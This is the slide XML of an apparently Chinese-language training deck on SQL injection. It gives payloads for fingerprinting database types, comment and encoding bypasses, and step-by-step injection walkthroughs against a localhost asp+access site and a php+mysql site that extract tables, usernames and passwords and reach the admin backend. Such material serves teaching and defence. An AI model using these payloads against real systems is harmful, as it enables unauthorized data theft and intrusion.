              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>或者使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>编码 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>%2b)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>    select id,name,pass from admin where id=1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>被注入后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>    select id,name,pass from admin where id=1 and 1=1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:sym typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>  此时</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:sym typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>1 and  1=1(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:sym typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>真</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:sym typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:sym typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>真为真</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:sym typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="14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1400">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:sym typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>返回有正常数据的页面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:sym typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                <a:sym typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="140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再执行：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>select id,name,pass from admin where id=1 and 1=2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此时 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>1 and 1=2(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>真</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>假</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>)where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>条件后的运算为假，因此查询不到数据库中的内容</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>页面就不会显示数据库中的数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
              <a:sym typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
            </a:endParaRP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6019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B628E-2688-43E4-8F3A-3801879AA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注入常见场景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0A2188-0E59-446F-9A9C-19E90661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468B76-F697-42D8-B411-E8267536F2CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="812800" y="1659467"/>
            <a:ext cx="10707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asp+access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php+mysql </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>aspx+mssql</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>php+mssql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40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75606-77F1-4465-878C-FD954ADB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语句讲解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025E2C-B43A-4122-AA2F-DC771E9F9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48314A-46AB-4063-ACFD-D17B65033F5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1388533"/>
            <a:ext cx="108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进入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>mysql </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>-p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>为输入密码</a:t>
            </a:r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8F0AF5-9E14-4DB8-93B3-4333F7FCA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81" y="1757866"/>
            <a:ext cx="5573219" cy="215802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0C3BFEA-8720-45C3-AB2C-6FBB22A0207C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="802181" y="3973687"/>
            <a:ext cx="5573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显示数据库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AE82F6-B8A3-4A63-9E8D-0F04AF39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81" y="4400814"/>
            <a:ext cx="3342857" cy="2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874C9-982E-4FCB-8459-C3500B9C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讲解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4E80FC-2CF5-4829-96B9-F08CDAEF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9A261D-88BB-4FBF-A7F4-60633DB95F97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736600" y="1209355"/>
            <a:ext cx="724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选择数据库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E3482B-F1D2-4F71-B920-DFC17D4B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603998"/>
            <a:ext cx="5655733" cy="11427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AE110F-9568-47B5-A91E-974BA60D1D3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736600" y="2810453"/>
            <a:ext cx="565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4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查看表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658E62-7D60-444B-B949-A5D278087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13" y="3179785"/>
            <a:ext cx="2798553" cy="169657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D2FAA4B-346A-475C-977C-92EA6FC1C023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="765913" y="4884670"/>
            <a:ext cx="4715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5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查看表结构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FD4DEF1-AD03-49C6-9FB5-6967592A7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767" y="4810766"/>
            <a:ext cx="4392876" cy="180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42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DA06F-5585-489B-95BE-3657B033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讲解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A54EE6-8C57-44AC-BF5D-486C37FD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FDD898-933E-4401-94EE-173BE08FF470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1371600"/>
            <a:ext cx="6933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mysql </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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764B12D-9BDF-4AB8-ABE3-7BEDC8EC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740933"/>
            <a:ext cx="3665009" cy="17567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1A182B-07FB-4C12-A265-62D5E5703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3863542"/>
            <a:ext cx="4685714" cy="1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1C892-EB0D-43FE-81DF-5C397262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注入判断数据库类型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7E700B-C487-440C-98D9-4735255F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F6AB5C-29EC-48C1-BFB6-7B7833A94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440486"/>
            <a:ext cx="5923809" cy="15047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FD321D6-92B4-4828-9278-6491929A87F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="321160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/>
              <a:t>Access:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    and (select count(*) from MSysAccessObjects)&gt;0 返回正常说明是access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    and exists(select count(*) from 表)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>SQLserver:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    and (select count(*) from sysobjects) &gt;0 返回正常说明是mssql</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>MySQL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>    and length(user())&gt;0    返回正常说明是MySQL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1585110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0EFAD-AB5D-4174-B1EC-72F56683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asp+access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入实例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07C638-D146-410D-BE8A-010F8CE6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BBA3F7-0DC5-47F3-9832-86115DAF5C0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1370168"/>
            <a:ext cx="97440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http://localhost:8001/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=1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E8AF56-C92D-440E-8780-24617C78E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32" y="1693334"/>
            <a:ext cx="5233535" cy="21057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A59DCC-016C-46A8-BA39-D1093E56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32" y="4387567"/>
            <a:ext cx="7435838" cy="247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99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E09D2D-3E21-4FFF-8145-A57309818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asp+access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入实例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7418CA-7FF0-4D66-A252-0A6DED30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6DC704-55E1-4318-981E-36828A50AA79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="736600" y="1380067"/>
            <a:ext cx="827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继续猜有多少列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3C5E32-E430-4905-8050-5F6F22DF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749400"/>
            <a:ext cx="6019800" cy="18503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08476E-0895-4620-BB78-8112B800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58" y="3827252"/>
            <a:ext cx="5718370" cy="211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12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79E2B-EEE1-4392-A77F-C464A05B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asp+access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入实例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06974-DB1D-4E1B-B20F-5426D444D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4A4603-A0C6-48F1-8C2E-52110C96046C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="778933" y="1346200"/>
            <a:ext cx="856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猜表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果这里报错，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>猜错误，继续改为其他的猜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3D7A35-3B5F-4F3D-8CBF-E99F21DE4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29" y="4445359"/>
            <a:ext cx="9025467" cy="21141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49D69AF-BD51-4436-8314-C8C4E209F5EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="778933" y="4106681"/>
            <a:ext cx="9101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这里猜出用户名，继续猜解密码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62AC45-5896-4ECA-97AE-3133B0A9D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37" y="1930025"/>
            <a:ext cx="9838095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81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/>
              <a:t>本章内容</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b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1.sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入种类</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3.sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4.sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入 防护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C095-35A3-4213-ADBA-E75FE83D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asp+access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入实例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DD5810-8DFD-403B-A4BC-D2C83B4CA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F53869-691A-46B8-8ED0-84C0E5DDB6B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1388533"/>
            <a:ext cx="782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已经拿到用户名，继续猜解密码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81F713-7F8B-48E4-99AD-276C21F1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757866"/>
            <a:ext cx="9854143" cy="221251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CC6166-55CC-4996-BF98-9F7BABB12654}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564620" y="4092629"/>
            <a:ext cx="849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15</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>字段更换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>重新尝试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219321-FCF2-47E9-9EE5-E91522E9F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4499474"/>
            <a:ext cx="8905786" cy="197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895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C67BC-0331-4584-8FEA-142BE23B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asp+access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>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24FEE9-A3FC-44CB-B7F6-B9BB069D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B79D6F-3CC6-4DEF-8327-182620613119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669924" y="1380067"/>
            <a:ext cx="1102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登入后台提权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7A0440-6549-4A59-AF92-C6797B9F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66" y="1861083"/>
            <a:ext cx="10727267" cy="296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86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9F091-7483-406A-B381-E7C1692F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php+mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入实例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A43E2-E60F-4072-987B-48CDEF46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C719FF-C964-42CB-857A-32328CAC08FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="1326571"/>
            <a:ext cx="101589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MYSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>注入中经常查询的内置变量与函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/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User</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/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Version()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/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Database()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/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@@datadir</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/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load_file()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>hex()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2413808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A92B3-0706-4EE2-B91F-DF7A2BF9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mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入技巧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B360E9-9885-4316-8582-B0A5EFDC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B77F227-56BD-40F1-AF02-DCA8A3144FD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="779489" y="1588957"/>
            <a:ext cx="11032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1.mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入 注释 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t># url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>%23</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内联注释 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>3. –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注释</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编码绕过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2BF4481-4858-44C0-8E40-60A3DDA7C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55" y="3272668"/>
            <a:ext cx="5857143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22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5652D-55B7-4918-AD60-62C94D51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php+mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入实例 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62DBF-8EFF-4724-803D-078B97A7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0E8F70-B63E-455B-9E08-77B1CAD2A83B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="1391904"/>
            <a:ext cx="68908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总结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找注入点  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>and or + -   url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>编码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查信息  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>猜列 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>联合查询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利用信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>爆表数据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zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>找后台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>—</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>登陆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0ADE0-246A-4242-A3B6-EC5D0C5ECE64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="745067" y="2782669"/>
            <a:ext cx="6561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php+mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入流程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>判断注入点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D18C6C2-BAC4-4D29-B495-347EEF07D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19" y="3400643"/>
            <a:ext cx="3152381" cy="4285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21A5D2C-3510-4508-965E-CE7337EBEFBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="803989" y="3971308"/>
            <a:ext cx="3462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2.order by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>猜列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B6BFB3E-D9FB-4E07-90C4-33BD2E0AF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19" y="4494424"/>
            <a:ext cx="3323809" cy="45714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339A883-D428-401D-9EF4-4FB354FA9696}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="873519" y="5164667"/>
            <a:ext cx="412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联合查询语句，暴出可显示字段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D0EAC73-4BAA-4C58-ADBF-88CCCBB2F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19" y="5744780"/>
            <a:ext cx="5476190" cy="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9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4677F-1A73-40AA-B1F7-388067BE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php+mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入流程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E99FDB-6D48-4C75-8C26-5154E3C4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983B13-C166-483F-8980-9D307689D017}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="1395751"/>
            <a:ext cx="786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4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>暴出数据库用户、版本、库名 系统信息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191862-DD61-497B-8BC9-21B58E1A0056}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="669923" y="2614990"/>
            <a:ext cx="10116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5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>暴出所有数据库  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>通过调整</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>limit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>即可遍历出所有的数据库，调整方法为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400"/>
              <a:t>limit 0,1;limit 1,2;limit 2,3……</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400"/>
              <a:t>直到出现错误或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>异常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74BCA0E-7A07-4C12-BBFC-D59F55B0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93" y="1943623"/>
            <a:ext cx="4628571" cy="31428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8C6B58A-4502-42DC-9158-448667A3A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3" y="3327984"/>
            <a:ext cx="7065001" cy="41798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EEB3A0D2-F582-4FEB-A18D-CF6C74CCEB7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
